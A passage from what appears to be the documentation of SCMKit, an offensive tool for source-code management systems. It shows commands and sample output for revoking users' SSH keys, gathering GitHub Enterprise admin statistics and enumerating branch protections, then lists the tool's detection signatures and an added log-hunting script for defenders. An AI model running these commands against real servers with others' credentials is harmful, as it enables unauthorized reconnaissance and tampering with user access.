Timestamp: 2/7/2022 4:09:40 PM
==================================================
SSH Key ID | SSH Key Value | Title
---------------------------------------------------------------
9 | .....p50edigBAF4lipVZkAM= | SCMKIT-RLzie
10 | .....vGJLPGHiTwIxW9i+xAs= | SCMKIT-muFGU
Remove an SSH key for a user in a particular SCM system
Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the target user SSH key ID to remove.
You have to provide the SSH key ID to remove. This ID was shown whenever you list SSH keys.
SCMKit.exe -s github -m removesshkey -c userName:password -u https://github.something.local -o sshKeyID
SCMKit.exe -s github -m removesshkey -c apiToken -u https://github.something.local -o sshKeyID
You have to provide the SSH key ID to remove. This ID was shown whenever you created the SSH key and is also shown when listing SSH keys.
SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID
SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID
Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. You have to provide the SSH key ID to remove. This ID was shown whenever you created the SSH key and is also shown when listing SSH keys.
SCMKit.exe -s bitbucket -m removesshkey -c userName:password -u https://bitbucket.something.local -o sshKeyID
C:\>SCMKit.exe -s bitbucket -m removesshkey -u http://bitbucket.hogwarts.local:7990 -c username:password -o 16
==================================================
Module: removesshkey
System: bitbucket
Auth Type: Username/Password
Options: 16
Target URL: http://bitbucket.hogwarts.local:7990
Timestamp: 2/7/2022 1:48:03 PM
==================================================
[+] SUCCESS: The SSH key of ID 16 was successfully revoked.
List admin stats in GitHub Enterprise
Provide the adminstats module, along with any relevant authentication information and URL. Site admin access in GitHub Enterprise is required to use this module.
SCMKit.exe -s github -m adminstats -c userName:password -u https://github.something.local
SCMKit.exe -s github -m adminstats -c apikey -u https://github.something.local
C:\>SCMKit.exe -s github -m adminstats -c username:password -u https://github-enterprise.hogwarts.local
==================================================
Module: adminstats
System: github
Auth Type: Username/Password
Options:
Target URL: https://github-enterprise.hogwarts.local
Timestamp: 1/14/2022 9:45:50 PM
==================================================
Admin Users | Suspended Users | Total Users
------------------------------------------------------
1 | 0 | 5
Total Repos | Total Wikis
-----------------------------------
4 | 0
Total Orgs | Total Team Members | Total Teams
----------------------------------------------------------
1 | 0 | 0
Private Gists | Public Gists
-----------------------------------
0 | 1
List branch protections in GitHub Enterprise
Provide the protection module, along with any relevant authentication information and URL. Optionally, supply a string in the options parameter to return matching results contained in repo names.
SCMKit.exe -s github -m protection -c userName:password -u https://github.something.local
SCMKit.exe -s github -m protection -c apikey -u https://github.something.local
SCMKit.exe -s github -m protection -c apikey -u https://github.something.local -o reponame
C:\>.\SCMKit.exe -u http://github.hogwarts.local -s github -c apiToken -m protection -o public-r
==================================================
Module: protection
System: github
Auth Type: API Key
Options: public-r
Target URL: http://github.hogwarts.local
Timestamp: 8/29/2022 2:02:42 PM
==================================================
Repo | Branch | Protection
----------------------------------------------------------------------------------------------------------
public-repo | dev | Protected: True
Status checks must pass before merge:
Branch must be up-to-date before merge: True
Owner review required before merge: True
Approvals required before merge: 2
Protections apply to repo admins: True
public-repo | main | Protected: False
Below are static signatures for the specific usage of this tool in its default state:
{266C644A-69B1-426B-A47C-1CF32B211F80}
SCMKIT-5dc493ada400c79dd318abbe770dac7c
SCMKIT- for the name.
For detection guidance of the techniques used by the tool, see the X-Force Red blog post.
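A defender can hunt for these default-state signatures in two places: web access logs of the SCM server and the inventory of access tokens and SSH keys. The following is an added example, not part of SCMKit or its repository; the combined access-log layout, the record fields (kind, id, name) and the log lines themselves are assumptions, while the names for IDs 59, 9 and 10 are taken from the sample output shown earlier.

```python
import re
from collections import defaultdict

# Static signatures copied from the list above.
SIG_STRING = "SCMKIT-5dc493ada400c79dd318abbe770dac7c"
NAME_PREFIX = "SCMKIT-"

# Combined access-log layout: an assumption about the SCM front end's logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def find_signature_requests(lines):
    """Group log lines containing the static string by client IP."""
    hits = defaultdict(list)
    for line in lines:
        # Match anywhere in the line, so any field that records it is caught.
        if SIG_STRING not in line:
            continue
        m = LOG_RE.match(line)
        if m:
            hits[m["ip"]].append((m["ts"], m["method"], m["path"], int(m["status"])))
        else:
            hits["unparsed"].append(line)  # keep evidence even if malformed
    return dict(hits)

def find_tool_named_credentials(records):
    """Return token / SSH key records whose name starts with SCMKIT-."""
    return [r for r in records if str(r.get("name", "")).startswith(NAME_PREFIX)]

# Constructed log lines (addresses and paths are illustrative).
SAMPLE_LOG = [
    '192.0.2.44 - - [20/Jan/2022:13:51:23 +0000] "POST /api/v4/example HTTP/1.1" 201 312 "-" "SCMKIT-5dc493ada400c79dd318abbe770dac7c"',
    '198.51.100.7 - - [20/Jan/2022:13:52:01 +0000] "GET /api/v4/projects HTTP/1.1" 200 5120 "-" "git/2.34.1"',
    '192.0.2.44 - - [20/Jan/2022:13:54:41 +0000] "GET /api/v4/example HTTP/1.1" 200 640 "-" "SCMKIT-5dc493ada400c79dd318abbe770dac7c"',
    'truncated entry SCMKIT-5dc493ada400c79dd318abbe770dac7c',
]
# Names for IDs 59, 9 and 10 come from the sample output above; 61 is constructed.
SAMPLE_CREDS = [
    {"kind": "pat", "id": 59, "name": "SCMKIT-AaCND"},
    {"kind": "pat", "id": 61, "name": "ci-deploy"},
    {"kind": "ssh", "id": 9, "name": "SCMKIT-RLzie"},
    {"kind": "ssh", "id": 10, "name": "SCMKIT-muFGU"},
]

if __name__ == "__main__":
    print(find_signature_requests(SAMPLE_LOG))
    print(find_tool_named_credentials(SAMPLE_CREDS))
```

These checks only cover the tool in its default state; a rebuilt binary with changed strings will not match, which is why the technique-level guidance referenced above still matters.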